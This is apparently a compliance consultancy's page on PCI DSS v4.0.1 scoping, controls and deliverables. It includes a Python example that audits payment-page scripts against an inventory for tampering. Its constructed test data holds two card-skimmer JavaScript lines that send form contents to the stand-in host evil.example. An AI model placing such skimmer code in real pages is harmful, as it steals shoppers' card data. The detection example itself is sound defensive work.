PCI DSS
Security standard for organizations handling cardholder data.
Overview
What it is, in plain English.
PCI DSS v4.0.1 is the current version of the standard that the card brands require of every merchant, processor, and service provider that stores, processes, or transmits cardholder data. The cost of compliance is dominated by scope, and the cost of a breach is dominated by what is in scope when it happens. Lyra's PCI work is focused on minimizing your Cardholder Data Environment (CDE) through segmentation, tokenization, and architectural redesign, then implementing the 12 requirements against what is left.
PCI DSS scoping, segmentation, control implementation, and ongoing monitoring across all merchant and service-provider levels.
Who needs it
Built for organizations that have to get this right.
Merchants of any level (1–4) accepting card payments
Service providers storing, processing, or transmitting cardholder data
SaaS platforms whose customers transact on their infrastructure
Call centers, healthcare billing operations, and any business taking card-not-present payments
Our approach
How we get you audit-ready and keep you there.
We don't drop policy templates and disappear. We design controls, implement them in your environment, prepare every artifact, and walk with you through the audit — then operate the program after certification so you stay compliant year over year.
- 01 Scope Reduction
Before we implement a single control, we shrink the CDE through tokenization, P2PE, network segmentation, and SAQ pathway selection.
- 02 Gap Assessment
We assess the in-scope environment against all 12 PCI DSS requirements and their sub-requirements, with a defensible scoping diagram.
- 03 Remediation & Hardening
We implement the technical and procedural controls: segmentation firewalls, FIM, logging, access reviews, and secure development practices.
- 04 QSA Support or SAQ Completion
For Level 1 entities, we partner with a QSA and run the audit prep. For SAQ-eligible entities, we complete the SAQ and Attestation of Compliance.
Key controls
What's actually in scope.
Network segmentation and firewall rule governance
Strong cryptography for cardholder data at rest and in transit
Tokenization and P2PE deployments
File integrity monitoring and centralized log management
Quarterly ASV scans and annual penetration testing
Secure software development and change management
Deliverables
What you walk away with.
Scoping diagram and Cardholder Data Environment definition
Gap assessment and remediation plan
Self-Assessment Questionnaire (A, A-EP, B, B-IP, C, C-VT, D, P2PE) or QSA-delivered Report on Compliance
Attestation of Compliance for acquirers and brands
Continuous monitoring program with quarterly evidence cycles
Timeline
SAQ pathway: 8–16 weeks. Level 1 RoC: 4–9 months including QSA fieldwork.
Questions we hear
Straight answers to the real questions.
- What changed in PCI DSS v4.0?
- v4.0 replaced v3.2.1 on March 31, 2024, and its future-dated requirements became mandatory on March 31, 2025; v4.0.1 (June 2024) is a clarification release with the same requirements. v4.0 introduced the customized approach as an alternative to the defined approach, expanded MFA to all access into the CDE, added targeted risk analyses, and added two controls on scripts loaded by payment pages: an authorized, integrity-checked script inventory with a business justification for each script (Req 6.4.3), and a change- and tamper-detection mechanism covering the page contents and the HTTP headers received by the browser (Req 11.6.1).
- Can we just outsource to a PCI-compliant processor?
- Outsourcing reduces scope dramatically, but it does not eliminate it. A merchant whose checkout redirects to, or embeds in an iframe, a compliant processor's hosted payment form can qualify for SAQ A, but the page that performs the redirect or hosts the iframe remains the merchant's responsibility: if an attacker can change that page, they can swap the destination or inject a skimmer, however compliant the processor is. v4.0's payment page script controls (Req 6.4.3 and 11.6.1) exist for exactly this case and catch many merchants by surprise. The January 2025 revision of SAQ A removed those two requirements from the questionnaire but added an eligibility criterion that the merchant has confirmed its site is not susceptible to script attacks, so the same controls remain the practical way to qualify.
- Do you provide ASV scans?
- We are not an Approved Scanning Vendor ourselves, but we partner with several ASVs and manage the scanning, finding remediation, and quarterly evidence on your behalf.
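The script controls discussed in the answers above reduce to a concrete, repeatable check: inventory every script the payment page loads, confirm each one is authorized and carries a business justification (Req 6.4.3), and detect when a script, or the page itself, has changed since the baseline (Req 11.6.1). The following is an added example written for this page; it is not Lyra's tooling and not anything published by the PCI SSC. The domains (`pay.example`, `cdn.example`, `evil.example`), the script bodies, the baseline inventory, and the two sample pages are all constructed so the check runs offline; in production the bodies would come from HTTPS fetches of the live page and its scripts, and the check would run on the schedule 11.6.1 requires (at least weekly, or at the frequency set by a targeted risk analysis).

```python
# Added example: payment-page script inventory and tamper check in the spirit
# of PCI DSS v4 Req 6.4.3 / 11.6.1. Everything below is constructed test data.
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(body: bytes) -> str:
    """Subresource Integrity value for a script body: 'sha384-<base64 digest>'."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


# Constructed script bodies standing in for what an HTTPS GET of each URL returns.
CHECKOUT_JS = b"window.Checkout = { mount: function (el) { /* hosted form */ } };"
ANALYTICS_JS = b"track('pageview');"
# The same analytics file after its CDN copy has been tampered with.
ANALYTICS_JS_TAMPERED = ANALYTICS_JS + b"\nnew Image().src = 'https://evil.example/c?d=' + document.forms[0].innerHTML;"
SKIMMER_JS = b"document.addEventListener('submit', e => navigator.sendBeacon('https://evil.example/x', new FormData(e.target)));"

AUTHORIZED_BODIES = {
    "https://pay.example/checkout.js": CHECKOUT_JS,
    "https://cdn.example/analytics.js": ANALYTICS_JS,
}
COMPROMISED_BODIES = {
    "https://pay.example/checkout.js": CHECKOUT_JS,
    "https://cdn.example/analytics.js": ANALYTICS_JS_TAMPERED,
    "https://evil.example/skimmer.js": SKIMMER_JS,
}

# The 6.4.3 inventory: each authorized script, why it is there, and the
# integrity value it must match. This is also the 11.6.1 baseline.
BASELINE = {
    url: {"justification": why, "integrity": sri_hash(AUTHORIZED_BODIES[url])}
    for url, why in [
        ("https://pay.example/checkout.js", "loads the processor's hosted payment form"),
        ("https://cdn.example/analytics.js", "page analytics, approved by marketing"),
    ]
}


def render_page(scripts):
    """Constructed page builder; scripts is a list of (src, integrity value or None)."""
    tags = "".join(
        f'<script src="{src}"'
        + (f' integrity="{sri}" crossorigin="anonymous"' if sri else "")
        + "></script>"
        for src, sri in scripts
    )
    return f"<html><head>{tags}</head><body><form id='pay'></form></body></html>"


CLEAN_PAGE = render_page([(u, BASELINE[u]["integrity"]) for u in BASELINE])
# Tampered page: a skimmer added, the analytics tag stripped of its integrity
# attribute so the browser accepts the modified CDN copy, and an inline script
# nobody approved.
COMPROMISED_PAGE = render_page([
    ("https://pay.example/checkout.js", BASELINE["https://pay.example/checkout.js"]["integrity"]),
    ("https://cdn.example/analytics.js", None),
    ("https://evil.example/skimmer.js", None),
]).replace("</head>", "<script>/* injected */</script></head>")


class ScriptCollector(HTMLParser):
    """Collects every <script> tag: external ones as (src, integrity attr), inline ones counted."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self.inline += 1


def audit_payment_page(html, baseline, fetch):
    """Compare a page against the baseline; an empty list means nothing changed.

    fetch(url) returns a script body as bytes. It is only called for URLs the
    baseline authorizes, so an attacker's script is reported without being fetched.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings, seen = [], set()
    for src, page_sri in collector.external:
        seen.add(src)
        if src not in baseline:
            findings.append(("unauthorized", src))
            continue
        expected = baseline[src]["integrity"]
        if sri_hash(fetch(src)) != expected:
            findings.append(("modified", src))      # served body no longer matches the inventory
        elif page_sri != expected:
            findings.append(("missing-sri", src))   # body is fine, but the browser is not enforcing it
    for src in baseline:
        if src not in seen:
            findings.append(("missing", src))       # an authorized script silently dropped from the page
    if collector.inline:
        findings.append(("inline-script", collector.inline))
    return findings


def audit_clean():
    return audit_payment_page(CLEAN_PAGE, BASELINE, AUTHORIZED_BODIES.__getitem__)


def audit_compromised():
    return audit_payment_page(COMPROMISED_PAGE, BASELINE, COMPROMISED_BODIES.__getitem__)


if __name__ == "__main__":
    print("clean page:", audit_clean())
    print("compromised page:", audit_compromised())
```

The clean page produces no findings; the compromised page reports the modified analytics script, the unauthorized skimmer, and the unapproved inline script. Two design points carry over to a real deployment: the baseline is the 6.4.3 inventory itself, so adding a script to the page without first recording a justification fails the check, and the fetch is keyed by the inventory rather than by whatever the page currently references, so an injected third-party URL is never contacted from the scanner. A production check would also snapshot the HTTP response headers 11.6.1 calls out (Content-Security-Policy in particular) and alert on any change, which this example omits.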
Other frameworks we support
SOC 2 (Type 1 and Type 2): AICPA SOC 2
ISO 27001: ISO/IEC 27001 ISMS
CMMC: Cybersecurity Maturity Model Certification
NIST 800-171: Protecting CUI in non-federal systems
NIST CSF (including 2.0): NIST Cybersecurity Framework
HIPAA / HITRUST: Healthcare privacy and security
24/7 Recovery
When the worst day hits, every minute matters.
Our breach team is standing by — call, email, or submit a request and we respond within minutes.